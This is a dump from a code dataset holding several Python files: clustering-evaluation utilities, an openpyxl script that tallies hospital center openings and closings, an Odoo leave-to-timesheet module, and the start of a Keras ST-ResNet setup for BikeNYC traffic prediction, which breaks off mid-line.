\"The average silhouette_score is :\", silhouette_avg)\n\n # Compute the silhouette scores for each sample\n sample_silhouette_values = silhouette_samples(X, cluster_labels)\n\n y_lower = 10\n for i in range(n_clusters):\n # Aggregate the silhouette scores for samples belonging to\n # cluster i, and sort them\n ith_cluster_silhouette_values = \\\n sample_silhouette_values[cluster_labels == i]\n\n ith_cluster_silhouette_values.sort()\n\n size_cluster_i = ith_cluster_silhouette_values.shape[0]\n y_upper = y_lower + size_cluster_i\n\n color = cm.nipy_spectral(float(i) / n_clusters)\n ax1.fill_betweenx(np.arange(y_lower, y_upper),\n 0, ith_cluster_silhouette_values,\n facecolor=color, edgecolor=color, alpha=0.7)\n\n # Label the silhouette plots with their cluster numbers at the middle\n ax1.text(-0.05, y_lower + 0.5 * size_cluster_i, str(i+1))\n\n # Compute the new y_lower for next plot\n y_lower = y_upper + 10 # 10 for the 0 samples\n\n ax1.set_title(\"The silhouette plot for the various clusters.\")\n ax1.set_xlabel(\"The silhouette coefficient values\")\n ax1.set_ylabel(\"Cluster label\")\n\n # The vertical line for average silhouette score of all the values\n ax1.axvline(x=silhouette_avg, color=\"red\", linestyle=\"--\")\n\n ax1.set_yticks([]) # Clear the yaxis labels / ticks\n ax1.set_xticks([])\n # ax1.set_xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])\n\n # 2nd Plot showing the actual clusters formed\n colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)\n ax2.scatter(X[:, 0], X[:, 1], marker='.', s=30, lw=0, alpha=0.7, c=colors, edgecolor='k')\n\n # Labeling the clusters\n centers = clusterer.cluster_centers_\n # Draw white circles at cluster centers\n ax2.scatter(centers[:, 0], centers[:, 1], marker='o',\n c=\"white\", alpha=1, s=200, edgecolor='k')\n\n for i, c in enumerate(centers):\n ax2.scatter(c[0], c[1], marker='$%d$' % (i+1), alpha=1,\n s=50, edgecolor='k')\n\n ax2.set_title(\"The visualization of the clustered data.\")\n ax2.set_xlabel(\"Feature space for the 1st feature\")\n ax2.set_ylabel(\"Feature space for the 2nd feature\")\n\n plt.suptitle((\"Silhouette analysis for KMeans clustering on sample data \"\n \"with n_clusters = %d\" % n_clusters),\n fontsize=14, fontweight='bold')\n\n plt.show()\n plt.plot(range(2, n_clust), sscore)\n plt.xlabel(r'Number of clusters ')\n plt.ylabel('average silhouette_score');\n \nplt.show()\n\n#----------------------------------------------------------------\ndef estimate_eps(X, hline=0.3, knn=10):\n '''estimate_eps(X, hline=0.3) : estimate eps for DBscan\n '''\n from sklearn.neighbors import NearestNeighbors\n \n neighbors = NearestNeighbors(n_neighbors=knn)\n neighbors_fit = neighbors.fit(X)\n distances, indices = neighbors_fit.kneighbors(X)\n\n distances = np.sort(distances, axis=0)\n distances = distances[:,1]\n plt.axhline(y=hline, color='r', linestyle='--')\n plt.plot(distances)\n \n#----------------------------------------------------------------\ndef dbscan(X, eps=0.5, min_samples=5):\n ''' dbscan(X, eps=0.3, smaples=10) :\n X: an array\n The main concept of DBSCAN algorithm is to locate regions of high density that are \n separated from one another by regions of low density.\n Density at a point P: Number of points within a circle of Radius Eps (ϵ) from point P.\n Dense Region: For each point in the cluster, the circle with radius ϵ contains at least \n minimum number of points (MinPts).\n '''\n from sklearn.cluster import DBSCAN\n \n db_cluster = DBSCAN(eps=eps, min_samples=min_samples, n_jobs=-1).fit(X)\n \n core_samples_mask = np.zeros_like(db_cluster.labels_, dtype=bool)\n core_samples_mask[db_cluster.core_sample_indices_] = True\n labels = db_cluster.labels_\n\n# Number of clusters in labels, ignoring noise if present.\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n\n print('Estimated number of clusters: %d' % n_clusters_)\n print('Estimated number of noise points: %d' % n_noise_)\n\n print(pd.DataFrame({'cluster': db_cluster.labels_}).value_counts())\n \n return labels\n\n#----------------------------------------------------------------\n\n# Gap Statistic for K means\n#https://towardsdatascience.com/cheat-sheet-to-implementing-7-methods-for-selecting-optimal-number-of-clusters-in-python-898241e1d6ad\ndef gap_stat(data, nrefs=3, maxClusters=15):\n \"\"\"\n Calculates KMeans optimal K using Gap Statistic \n Params:\n data: ndarry of shape (n_samples, n_features)\n nrefs: number of sample reference datasets to create\n maxClusters: Maximum number of clusters to test for\n Returns: (gaps, optimalK)\n \"\"\"\n gaps = np.zeros((len(range(1, maxClusters)),))\n resultsdf = pd.DataFrame({'clusterCount':[], 'gap':[]})\n for gap_index, k in enumerate(range(1, maxClusters)):\n# Holder for reference dispersion results\n refDisps = np.zeros(nrefs)\n# For n references, generate random sample and perform kmeans getting resulting dispersion of each loop\n for i in range(nrefs):\n \n # Create new random reference set\n randomReference = np.random.random_sample(size=data.shape)\n \n # Fit to it\n km = KMeans(k)\n km.fit(randomReference)\n \n refDisp = km.inertia_\n refDisps[i] = refDisp\n# Fit cluster to original data and create dispersion\n km = KMeans(k)\n km.fit(data)\n \n origDisp = km.inertia_\n# Calculate gap statistic\n gap = np.log(np.mean(refDisps)) - np.log(origDisp)\n# Assign this loop's gap statistic to gaps\n gaps[gap_index] = gap\n \n resultsdf = resultsdf.append({'clusterCount':k, 'gap':gap}, ignore_index=True)\n \n plt.plot(resultsdf['clusterCount'], resultsdf['gap'], linestyle='--', marker='o', color='b');\n plt.xlabel('K');\n plt.ylabel('Gap Statistic');\n plt.title('Gap Statistic vs. K'); \n return (gaps.argmax() + 1, resultsdf)\n\n#score_g, ddf = gap_stat(df4_tran, nrefs=5, maxClusters=10)\n\n#------------------------------------------------------------------------\ndef elbow (X, clusters=10, figsize=(6,6)):\n ''' A function to visulize the change of WSS with number of clusters\n X: a np.array; clusters: the number of given clusters\n '''\n sse = []\n list_k = list(range(1, clusters))\n\n# Run the Kmeans algorithm and get the index of data points clusters\n for k in list_k:\n km = KMeans(n_clusters=k)\n km.fit(X)\n sse.append(km.inertia_)\n\n# Plot sse against k\n plt.figure(figsize=figsize)\n plt.plot(list_k, sse, '-o')\n plt.xlabel(r'Number of clusters ')\n plt.ylabel('Sum of squared distance (within)');\n plt.grid()\n \n#----------------------------------------------------------------\ndef kmeans_metrics(X, clusters=15, metric='elbow'):\n ''' kmeans_metrics(X, clusters, metric='elbow')\n X: a df or np; clusters: number of clusters \n \n metric='silhouette' or 'calinski_harabasz'\n 1. Elbow: The explained variation changes rapidly for a small number of clusters \n and then it slows down leading to an elbow formation in the curve.\n \n 2. Silhouette Coefficient:\n It tells us if individual points are correctly assigned to their clusters.\n If S(i) close to 0 means that the point is between two clusters\n If S(i) is closer to -1, then we would be better off assigning it to the other clusters\n If S(i) is close to 1, then the point belongs to the ‘correct’ cluster\n \n 3. Calinski-Harabasz Index\n The Calinski-Harabasz Index is based on the idea that clusters that are (1) \n themselves very compact and (2) well-spaced from each other are good clusters.\n ** Calinski Harabasz Index is maximized for optimized cluster.\n \n '''\n # Elbow Method for K means\n \n from yellowbrick.cluster import KElbowVisualizer\n model = KMeans()\n# k is range of number of clusters.\n if (metric=='elbow'):\n visualizer = KElbowVisualizer(model, k=(2,clusters), timings= True)\n else:\n visualizer = KElbowVisualizer(model, k=(2,clusters), metric=metric, timings= True)\n visualizer.fit(X) # Fit data to visualizer\n visualizer.show() # Finalize and render figure\n \n#kmeans_metrics(df4_tran, metric='elbow')\n#kmeans_metrics(df4_tran, clusters=20, metric='silhouette')\n#kmeans_metrics(df4_tran, clusters=20, metric='calinski_harabasz')\n\n#----------------------------------------------------------------\ndef Davies_Bouldin_index(X, center=20):\n ''' Davies_Bouldin_index(X, center=20)\n INPUT:\n X: np or df. \n center - the number of centers you want (the k value)\n OUTPUT:\n score - the Davies Bouldin score for the kmeans model fit to the data\n \n Like silhouette coefficient and Calinski-Harabasz index, the DB index captures \n both the separation and compactness of the clusters.This is due to the fact \n that the measure’s ‘max’ statement repeatedly selects the values where the average \n point is farthest away from its center, and where the centers are closest together. \n But unlike silhouette coefficient and Calinski-Harabasz index, as DB index falls, \n the clustering improves. \n \n look for the small index!!\n '''\n\n scores = [] #get the scores\n centers = list(range(2,center))\n for center in centers:\n scores.append(get_kmeans_score(X, center))\n \n plt.plot(centers, scores, linestyle='--', marker='o', color='b')\n plt.xlabel('K')\n plt.ylabel('Davies Bouldin score')\n plt.title('Davies Bouldin score vs. K')\n \n#------------------------------------------------------------------------ \n\ndef get_kmeans_score(X, center):\n \n from sklearn.metrics import davies_bouldin_score\n\n #instantiate kmeans\n kmeans = KMeans(n_clusters=center)\n# Then fit the model to your data using the fit method\n model = kmeans.fit_predict(X)\n \n # Calculate Davies Bouldin score\n score = davies_bouldin_score(X, model)\n \n return score\n\n#Davies_Bouldin_index(df4_tran, center=30)\n\n#----------------------------------------------------------------\ndef hierarchical(X, clusters=10, figsize=(10, 8), hline=38):\n ''' The Agglomerative Hierarchical Clustering\n X : an array; n_clust: the number of given clusters\n\n begin with every point in the dataset as a “cluster.” Then find the two closest\n points and combine them into a cluster. Then, find the next closest points, \n and those become a cluster. Repeat the process until we only have one big giant cluster.\n '''\n\n# create dendrogram (for plotint Hierarchical Clusters)\n dendrogram = sch.dendrogram(sch.linkage(X, method='ward'))\n# create clusters\n hc = AgglomerativeClustering(n_clusters=clusters, affinity = 'euclidean', linkage = 'ward')\n plt.axhline(y=36, color='r', linestyle='--')\n\n# save clusters for chart\n y_hc = hc.fit_predict(X)\n \n return y_hc\n\n#------------------------------------------------------------------------ \ndef gmm(X, clusters=20):\n '''\n BIC for GMM. pick the smallest one\n \n '''\n# \n from sklearn.mixture import GaussianMixture\n n_components = range(1, clusters)\n covariance_type = ['spherical', 'tied', 'diag', 'full']\n score=[]\n for cov in covariance_type:\n for n_comp in n_components:\n gmm=GaussianMixture(n_components=n_comp,covariance_type=cov)\n gmm.fit(X)\n score.append((cov,n_comp,gmm.bic(df4_tran)))\n \n return score\n#gmm(df4_tran, clusters=20)\n#----------------------------------------------------------------\ndef kprototypes_cost(df, categorical=[], nclusters=3):\n '''kprototypes_cost(df, categorical=[], nclusters=3) : Elbow plot with cost (very slow!)\n categorical: a list to hold the positions of the categorical variable in DF (e.g. [1, 4])\n df: the data frame\n nclusters: number of clusters to run\n '''\n \n from tqdm import tqdm #provide visual bar\n import plotly.graph_objects as go\n \n#Choosing optimal K value\n costs = []\n n_clusters = []\n clusters_assigned = []\n \n for num_clusters in tqdm(range(2,nclusters)):\n kproto = KPrototypes(n_clusters=num_clusters, init='Huang', n_jobs=-1, max_iter=50) \n clusters = kproto.fit_predict(df, categorical=categorical)\n \n costs.append(kproto.cost_) \n n_clusters.append(i)\n clusters_assigned.append(clusters)\n\n fig = go.Figure(data=go.Scatter(x=n_clusters, y=costs ))\n fig.show\n \n return clusters_assigned\n\n#kprototypes_cost(dft, categorical=[6], nclusters=4) \n#----------------------------------------------------------------\ndef kmodes_cost(df_in, ncluster=8):\n '''kmodes_cost(df_in, ncluster=8)\n https://github.com/nicodv/kmodes/blob/master/kmodes/kmodes.py\n \n def __init__(self, n_clusters=8, max_iter=100, cat_dissim=matching_dissim,\n init='Cao', n_init=10, verbose=0, random_state=None, n_jobs=1):\n '''\n \n from tqdm import tqdm #provide visual bar\n\n cost = []\n for i in tqdm(range(1,ncluster)):\n kmode = KModes(n_clusters=i, init = \"Cao\", n_jobs=-1)\n kmode.fit_predict(df_in)\n cost.append(kmode.cost_)\n \n y = np.array([i for i in range(1,ncluster,1)])\n plt.plot(y,cost) \n plt.xlabel('K')\n plt.ylabel('Cost');\n#----------------------------------------------------------------\n#----------------------------------------------------------------\n#----------------------------------------------------------------\n\n\n","sub_path":"cluster_utility.py","file_name":"cluster_utility.py","file_ext":"py","file_size_in_byte":21364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"479434846","text":"print (\"Importing openpyxl and RNG\")\nimport openpyxl\nfrom random import randint\nprint(\"Success\")\n\nfrom openpyxl.cell import get_column_letter, column_index_from_string\nprint ('Importing OS and Time')\nimport os\nimport time\nimport datetime\nprint(\"Success\")\nprint(\"Configuring console\")\nimport sys\nos.getcwd()\n\n\n#Questions\nw = str(input(\"What workbook do you wish to process? \"))\nprint ('The following questions pertain to all centers')\nprint('')\nyear_p = int(input('What year is the base for counting closed and open centers? '))\nrow_new = int(input('How many rows would you like to check? '))\nnewsheet = input(\"What tab is the material to process on? \")\nprint(\"\")\nprint(\"\")\n\nw_name = w+'.xlsx'\nprint(\"Workbook\",w,\"found\")\nprint(\"Opening and soft copying workbook (this takes longer for larger files)\")\nwb = openpyxl.load_workbook(w+'.xlsx') #ENTER XLSX NAME HERE WITH TAIL\n\n\nclosedsheet = newsheet\n\nsheet = wb.get_sheet_by_name(str(newsheet)) #ENTER SHEET NAME HERE\nsheetx = wb.get_sheet_by_name(str(closedsheet))\n\nyear_x = year_p\nrow_closed = row_new\n\ncapr = sheet.get_highest_row()\ncapc = sheet.get_highest_column()\n\ncapxr = sheetx.get_highest_row()\ncapxc = sheetx.get_highest_column()\n\n#OPEN counter\n\nx = 2\ncount = 0\n\nYP = int(year_p * 10000)\nprint('Checking for year', year_p, 'as floor parameter', YP)\n\nif 1 + 2 == 3:\n\tprint(\"Checking for new centers opened since\", year_p, \"will begin soon\")\n\ttime.sleep(2)\n\nwhile x <= row_new: #PARAMETER\n\tsys.stdout.write(\"\\rChecking row #%.0f\" % (x))\n\tsys.stdout.flush()\n\tif int(sheet.cell(row = int(x), column = int(4)).value) > YP: #PARAMATERS\n\t\tcount += 1\n\tx+=1\nprint(\"\")\nprint (\"New Centers:\",count)\nprint(\"\")\n#CLOSED counter\nYX = int(year_x * 10000)\nxx = 2\ncountx = 0\n\nprint('Checking for year', year_x, 'as floor parameter', YX)\n\nif 1 + 2 == 3:\n\tprint(\"Checking for centers closed since\", year_x, \"will begin soon\")\n\ttime.sleep(5)\n\n\nwhile xx <= row_closed: #PARAMETER\n\tsys.stdout.write(\"\\rChecking row #%.0f\" % (xx))\n\tsys.stdout.flush()\n\trowxx = int(sheetx.cell(row = int(xx), column = int(3)).value or 0)\n\tif rowxx == \"None\":\n\t\tprint\n\telif rowxx > YX:\n\t\tcountx += 1\n\txx+=1\n\nprint(\"\")\nprint (\"Closed Centers:\",countx)\nprint(\"\")\n\n######### COUNTING RESULT WORKBOOK CREATION\nwbnew = openpyxl.Workbook()\nwbnew.create_sheet()\nwbnew.create_sheet(index=0, title='First_Sheet')\nsheet1 = wbnew.get_sheet_by_name('First_Sheet')\nsheet1['A1'] = \"New centers since %s\" % (year_p)\nsheet1['A2'] = \"Centers closed %s\" % (year_x)\nsheet1['B1'] = count\nsheet1['B2'] = countx\nsheet1.column_dimensions['A'].width = 22\nsheet1.column_dimensions['B'].width = 9\n\nr = randint(0,100000)\n\ntoday = datetime.date.today()\nyear = today.year\nmon = today.month\nday = today.day\nctime = today.ctime()\nordinal = today.toordinal()\nletterR = 'r'\nzero = 0\nwbnew.save('results_DATE%.0f%.0f%.0fRNG%.0f%.0f%.0f%.0f%.0f.xlsx' % (year,mon,day,zero,zero,zero,r,ordinal))\n\nprint (\"Results created in mother folder\")\n\nif 1 + 2 == 3:\n\tprint('Creation of filtered dictionary will begin soon')\n\ttime.sleep(3)\n\n\nprint(\"\")\n\n\n\n#CREATING TABS for organized excel file \nsheeth = sheetx \n\nfiltered_dict_h = {}\n\nxx = 1\nsupercount = 0\n\nwhile xx-1 <= row_new:\n\tsys.stdout.write(\"\\r Found hospital center #%.0f\" % (supercount+1))\n\tsys.stdout.flush()\n\tcell = \"A%.0f\" % (xx)\n\tndict = []\n\tif sheeth[cell].value == 1: ########## DEFINE VALUE HERE, CHANGE TO 1 FOR HOSP\n\t\n\t\ti = 1\n\t\tsupercount += 1\n\t\twhile i <= capc:\n\t\t\tv_a = str(sheeth.cell(row = int(xx), column = int(i)).value or '')\n\t\t\tndict.insert(len(ndict), str(v_a))\n\t\t\ti += 1\n\t\tfiltered_dict_h.update({ xx: ndict})\n\txx += 1\n\nprint(\" \")\n\n#Hospital workbook creation\n\nwb2new = openpyxl.Workbook()\nprint ('creating new workbook for parsed data')\nwb2new.create_sheet()\nwb2new.create_sheet(index=0, title='Hospitals')\nsheet = wb2new.get_sheet_by_name('Hospitals')\n\n\n\n#GENERAL SHEET #################################\n\nprint('')\nmegacount = 0\nprint('Creating the general sheet')\nif 1 + 2 == 3:\n\ttime.sleep(3)\n\nx = 2\nwhile x <= row_new:\n\tp = 100*((x)/row_new)\n\tsys.stdout.write(\"\\r Creation of General Sheet is %d%% Complete\" % p)\n\ti = 1\n\twhile i < capc:\n\t\tc = get_column_letter(i)\n\t\tsheet['%s%.0f' % (c, x)] = str(filtered_dict_h[x][i])\n\t\tmegacount += 1\n\t\ti += 1\n\tx += 1\n\tsys.stdout.flush()\nr = randint(0,10000000)\n\nprint(\" \")\n\n#OPEN TAB ###########################################\nprint(\"\")\nprint('Creating Open sheet')\nif 1 + 2 == 3:\n\ttime.sleep(3)\n\nwb2new.create_sheet(index=1, title='Open_Hospitals')\nopensheet = wb2new.get_sheet_by_name('Open_Hospitals')\n\n\n#Count of Open Centers\n\n\nmegacountn = 0\n\nx = 2\nwhile x < row_new:\n\tsys.stdout.write(\"\\r Open center counter: %0f\" % (int(megacountn)))\n\tif filtered_dict_h[x][1] == '':\n\t\tmegacountn += 1\n\tsys.stdout.flush()\n\tx += 1\n\nmegacount = 0\nprint(\" \")\n\n#CREATING NEW DICTIONARY\n\nx = 2\nopenx = 0\nopendict = {}\n\nwhile x < row_new:\n\tp = ((x+1)/row_new)*100\n\tsys.stdout.write(\"\\r Creation of new dictionary set is %d%% complete\" % p)\n\tif filtered_dict_h[x][1] == '':\n\t\topendict.update({ openx: filtered_dict_h[x]})\n\t\topenx += 1\n\tsys.stdout.flush()\n\tx += 1\n\nprint(\" \")\n\n#PRINTING SHEET\nx = 1\nwhile x < megacountn:\n\tp = 100 * ((x+1)/megacountn)\n\tsys.stdout.write(\"\\r Creation of Open Sheet is %d%% Complete\" % p)\n\tif opendict[x][1] == '':\n\t\ti = 1\n\t\twhile i < capxc:\n\t\t\tc = get_column_letter(i)\n\t\t\topensheet['%s%.0f' % (c, x+1)] = str(opendict[x][i])\n\t\t\tmegacount += 1\n\t\t\ti += 1\n\tsys.stdout.flush()\t\n\tx += 1\n\nprint(\" \")\t\n\nprint(\"\")\n\n\n\n#OPEN X YEAR TAB ###########################################\nprint(\"\")\nprint('Creating Open on %0f sheet' % (year_p))\nif 1 + 2 == 3:\n\ttime.sleep(2)\n\nwb2new.create_sheet(index=2, title='Open %s Hospitals' % (str(year_p)))\nopensheet = wb2new.get_sheet_by_name('Open %s Hospitals' % (str(year_p)))\n\n\n#Count of Open Centers\n\n\nmegacountn = 0\n\nx = 2\nwhile x < row_new:\n\tsys.stdout.write(\"\\r Open x year counter: %0f\" % (int(megacountn)))\n\tif int(filtered_dict_h[x][3]) > YP:\n\t\tmegacountn += 1\n\tsys.stdout.flush()\n\tx += 1\n\nmegacount = 0\nprint(\" \")\n\n#CREATING NEW DICTIONARY\n\nx = 2\nopenx = 0\nopendict = {}\n\nwhile x < row_new:\n\tp = ((x+1)/row_new)*100\n\tsys.stdout.write(\"\\r Creation of new dictionary set is %d%% complete\" % p)\n\tif int(filtered_dict_h[x][3]) > YP:\n\t\topendict.update({ openx: filtered_dict_h[x]})\n\t\topenx += 1\n\tsys.stdout.flush()\n\tx += 1\n\nprint(\" \")\n\n#PRINTING SHEET\nx = 1\nwhile x < megacountn:\n\tp = 100 * ((x+1)/megacountn)\n\tsys.stdout.write(\"\\r Creation of Open Sheet is %d%% Complete\" % p)\n\tif int(opendict[x][3]) > YP:\n\t\ti = 1\n\t\twhile i < capxc:\n\t\t\tc = get_column_letter(i)\n\t\t\topensheet['%s%.0f' % (c, x+1)] = str(opendict[x][i])\n\t\t\tmegacount += 1\n\t\t\ti += 1\n\tsys.stdout.flush()\t\n\tx += 1\n\nprint(\" \")\t\n\nprint(\"\")\n\n\n\n#CLOSED TAB #############################################\nprint('Creating closed centers sheet')\nif 1 + 2 == 3:\n\ttime.sleep(3)\n\nwb2new.create_sheet(index=3, title='Closed_Hospitals')\nclosedsheet = wb2new.get_sheet_by_name('Closed_Hospitals')\n\n\nprint(\" \")\nmegacountc = 0\n\nx = 2\nYP = int(year_p * 10000)\nwhile x < row_new:\n\tsys.stdout.write(\"\\r Closed center counter: %.0f\" % (int(megacountc)))\n\tv_a = str(sheeth.cell(row = int(x), column = int(3)).value or 0)\n\tif int(v_a) > YP:\n\t\tmegacountc +=1\n\tsys.stdout.flush()\n\tx+=1\n\nmegacount = 0\nprint(' ')\n\nx = 2\nxx = 0\ncloseddict = {}\nxx = 0\nwhile x < row_new:\n\tp = ((x+1)/row_new)*100\n\tsys.stdout.write(\"\\rCreation of new dictionary set is %d%% complete\" % p)\n\tv_a = str(sheeth.cell(row = int(x), column = int(3)).value or 0)\n\tndict = []\n\tif int(v_a) > YP:\n\t\txx += 1\n\t\ti = 1\n\t\twhile i <= capc:\n\t\t\tv_a = str(sheeth.cell(row = int(x), column = int(i)).value or '')\n\t\t\tndict.insert(len(ndict), str(v_a))\n\t\t\ti += 1\n\t\tcloseddict.update({ xx: ndict})\n\tsys.stdout.flush()\n\tx += 1\nprint(\" \")\n\n\nx = 1\nwhile x < megacountc:\n\tp = 100*((x+1)/megacountc)\n\tsys.stdout.write(\"\\rCreation of Closed Sheet is %d%% Complete\" % p)\n\ti = 1\n\twhile i < capxc:\n\t\tc = get_column_letter(i)\n\t\tcx = c + str(x+1)\n\t\tclosedsheet[cx] = str(closeddict[x][i])\n\t\tmegacount += 1\n\t\ti += 1\n\tsys.stdout.flush()\n\tx+= 1\nprint(\" \")\nprint(\"\")\n#conclusion of final document\n\nprint ('Creating List of Hospitals Centers.xlsx, this will take a while')\nprint ('DO NOT OPEN THE LIST FILE SINCE IT IS BEING BUILT')\nprint(\"\")\nwb2new.save('list of hospital centers%.0f.xlsx' % (r))\nprint (\"You may open the result file\")\n\ni = 15\nwhile 0 < i <= 15:\n\ttime.sleep(.1)\n\tsys.stdout.write(\"\\r Program closing in %.1f second(s) \" % i)\n\tsys.stdout.flush()\n\ti -= .1","sub_path":"Parse Hospital file.py","file_name":"Parse Hospital file.py","file_ext":"py","file_size_in_byte":8419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"544675775","text":"import calendar\nimport datetime\nfrom datetime import date\nimport logging\nimport math\nimport time\nfrom operator import attrgetter\nfrom werkzeug import url_encode\nfrom openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT\n\nfrom dateutil.relativedelta import relativedelta\n\nfrom openerp.exceptions import UserError, AccessError\nfrom openerp import tools\nfrom openerp.tools.translate import _\nfrom openerp import models, api, fields\n\nclass hr_holidays(models.Model):\n _inherit = \"hr.holidays\"\n\n @api.multi\n def holidays_refuse(self):\n res = super(hr_holidays, self).holidays_refuse()\n account_analytic_line_obj = self.env[\"account.analytic.line\"]\n for holiday in self:\n analytic_line_ids = account_analytic_line_obj.search([('fal_leave_id', '=', holiday.id)])\n if analytic_line_ids:\n analytic_line_ids.unlink()\n return res\n\n @api.multi\n def holidays_validate(self):\n res = super(hr_holidays, self).holidays_validate()\n timesheet_obj = self.env[\"hr_timesheet_sheet.sheet\"]\n account_analytic_line_obj = self.env[\"account.analytic.line\"]\n for holiday in (holidays for holidays in self if holidays.date_from and holidays.date_to):\n date_from = datetime.datetime.strptime(holiday.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n date_to = datetime.datetime.strptime(holiday.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n if res:\n not_working_days = ['0', '1', '2', '3', '4', '5', '6']\n employee_id_obj = holiday.employee_id\n if employee_id_obj.contract_id and employee_id_obj.contract_id.working_hours:\n for attendance_id in employee_id_obj.contract_id.working_hours.attendance_ids:\n if attendance_id.dayofweek in not_working_days:\n not_working_days.remove(attendance_id.dayofweek)\n for i in range((date_to - date_from).days + 1):\n if not (str((date_from + datetime.timedelta(days=i)).weekday()) in not_working_days):\n leave_time = sum((working_hours.hour_to - working_hours.hour_from) for working_hours in holiday.employee_id.contract_id.working_hours.attendance_ids if int(working_hours.dayofweek) == (date_from + datetime.timedelta(days=i)).weekday())\n vals = holiday._prepare_anlytic_line_vals(leave_time, date_from, i)\n account_analytic_line_obj.create(vals)\n if not timesheet_obj.search([('date_to', '>=', date_from + datetime.timedelta(days=i)), ('date_from', '<=', date_from + datetime.timedelta(days=i)), ('employee_id', '=', holiday.employee_id.id)]):\n from_day_of_week = (date_from + datetime.timedelta(days=i)).weekday()\n first_day_of_week = (date_from + datetime.timedelta(days=i)) - datetime.timedelta(days=from_day_of_week)\n timesheet_obj.create({\n 'employee_id': holiday.employee_id and holiday.employee_id.id,\n 'date_from': first_day_of_week,\n 'date_to': first_day_of_week + datetime.timedelta(days=6),\n 'state': 'draft',\n 'department_id': holiday.department_id and holiday.department_id.id or False,\n 'company_id': holiday.employee_id and holiday.employee_id.company_id and holiday.employee_id.company_id.id or False,\n })\n return res\n\n @api.multi\n def _prepare_anlytic_line_vals(self, unit_amount, date_from, i):\n self.ensure_one()\n if not self.employee_id.fal_leave_timesheet_analytic_account_id:\n raise UserError(_('Please Fill Employee Leave Timesheet Analytic Account First.'))\n return {\n 'fal_leave_id': self.id,\n 'name': self.name or self.holiday_status_id and self.holiday_status_id.name,\n 'date': date_from + datetime.timedelta(days=i),\n 'unit_amount': unit_amount,\n 'account_id': self.employee_id.fal_leave_timesheet_analytic_account_id and self.employee_id.fal_leave_timesheet_analytic_account_id.id,\n 'is_timesheet': True,\n 'user_id': self.employee_id.user_id.id,\n }\n\n# end of hr_holidays()\n\nclass account_analytic_line(models.Model):\n _inherit = 'account.analytic.line'\n\n fal_leave_id = fields.Many2one('hr.holidays', 'Leave')\n\n#end of account_analytic_line","sub_path":"fal_leave_timesheet/models/hr_holidays.py","file_name":"hr_holidays.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"434863004","text":"from __future__ import print_function\r\nimport os\r\nimport cPickle as pickle\r\nimport numpy as np\r\nimport math\r\n\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]='0'\r\nimport tensorflow as tf #from V1707\r\nimport setproctitle #from V1707\r\nfrom keras import backend as K\r\nK.set_image_data_format('channels_first')\r\n\r\nconfig=tf.ConfigProto() #from V1707\r\n#config.gpu_options.allow_growth=True #from V1707\r\nconfig.gpu_options.per_process_gpu_memory_fraction=0.7\r\nsess=tf.Session(config=config) #from V1707\r\n#import keras.backend.tensorflow_backend as KTF\r\n#KTF._set_session(tf.Session(config=config))\r\nsetproctitle.setproctitle('try@linziqian') #from V1707\r\n\r\n\r\nos.environ[\"DATAPATH\"]='/home/stu/linziqian'\r\n\r\n\r\nfrom keras.optimizers import Adam\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras.layers import Reshape,Input,LSTM,Activation,Dense,average,Concatenate,Add,Dropout,BatchNormalization,PReLU\r\nfrom keras.models import Model\r\nfrom keras.layers.convolutional import Convolution2D\r\nfrom deepst.models.STResNet import stresnet\r\nfrom deepst.config import Config\r\nimport deepst.metrics as metrics\r\nfrom deepst.datasets import BikeNYC\r\nnp.random.seed(1337) # for reproducibility\r\nfrom pdb import set_trace\r\n#set_trace()\r\n\r\n# parameters\r\n# data path, you may set your own data path with the global envirmental\r\n# variable DATAPATH\r\nDATAPATH = Config().DATAPATH\r\nnb_epoch = 200 # number of epoch at training stage\r\nnb_epoch_cont = 200 # number of epoch at training (cont) stage\r\nbatch_size = 128 # batch size\r\nT = 24 # number of time intervals in one day\r\n\r\nlr = 0.0002 # learning rate\r\nlen_closeness = 4 # length of closeness dependent sequence\r\nlen_period = 4 # length of peroid dependent sequence\r\nlen_trend = 4 # length of trend dependent sequence\r\nnb_residual_unit = 4 # number of residual units\r\n\r\nnb_flow = 2 # there are two types of flows: new-flow and end-flow\r\n# divide data into two subsets: Train & Test, of which the test set is the\r\n# last 10 days\r\ndays_test = 10\r\nlen_test = T * days_test\r\nmap_height, map_width = 16, 8 # grid size\r\n# For NYC Bike data, there are 81 available grid-based areas, each of\r\n# which includes at least ONE bike station. Therefore, we modify the final\r\n# RMSE by multiplying the following factor (i.e., factor).\r\nnb_area = 81\r\nm_factor = math.sqrt(1. * map_height * map_width / nb_area)\r\nprint('factor: ', m_factor)\r\npath_result = 'RET'\r\npath_model = 'MODEL'\r\n\r\nif os.path.isdir(path_result) is False:\r\n os.mkdir(path_result)\r\nif os.path.isdir(path_model) is False:\r\n os.mkdir(path_model)\r\n\r\n\r\n#Conv2=np.zeros([8,8])\r\n#LSTM2=np.zeros([8,8])\r\nConv2=np.load('Conv2.npy')\r\nLSTM2=np.load('LSTM2.npy')\r\n\r\nTT1=1\r\nFF1=128\r\ninput1_128=Input(shape=[FF1])\r\ncpt_conv1=PReLU()(input1_128)\r\ncpt_conv1=BatchNormalization()(cpt_conv1)\r\ncpt_conv1=Dropout(0.2)(cpt_conv1)\r\ncpt_conv1=Dense(units=2,activation='tanh')(cpt_conv1)\r\nmodel1=Model(inputs=input1_128,outputs=cpt_conv1)\r\nmodel1.compile(loss='mse', optimizer=Adam(lr), metrics=[metrics.rmse])\r\n\r\n\r\nprint(\"loading data...\")\r\nX_train, Y_train, X_test, Y_test, mmn, external_dim, timestamp_train, timestamp_test = BikeNYC.load_data(\r\n T=T, nb_flow=nb_flow, len_closeness=len_closeness, len_period=len_period, len_trend=len_trend, len_test=len_test,\r\n preprocess_name='preprocessing.pkl', meta_data=False)\r\nprint(\"\\n days (test): \", [v[:8] for v in 